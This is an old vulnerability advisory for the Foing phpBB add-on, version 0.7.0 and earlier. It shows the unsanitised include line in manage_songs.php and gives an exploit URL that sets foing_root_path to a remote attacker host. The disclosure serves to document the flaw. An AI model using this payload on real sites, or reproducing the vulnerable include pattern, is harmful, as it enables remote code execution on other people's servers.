Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13110
HistoryJun 13, 2006 - 12:00 a.m.

Foing (manage_songs.php) Remote File Inclusion[phpBB]

2006-06-1300:00:00
vulners.com
12

Foing (manage_songs.php) Remote File Inclusion[phpBB]

Contact : email: [email protected] & msn: [email protected]

Risk : High

Class : Remote

Script : Foing

Version : 0.7.0 e previous


Vulnerable code :

include($foing_root_path . 'includes/common.php');


http://www.site.com/[foing_path]/manage_songs.php?foing_root_path=http://attacker

by Darkfire and IR4DEX GROUP
Greetz: Smurf_RedHat :: V0lks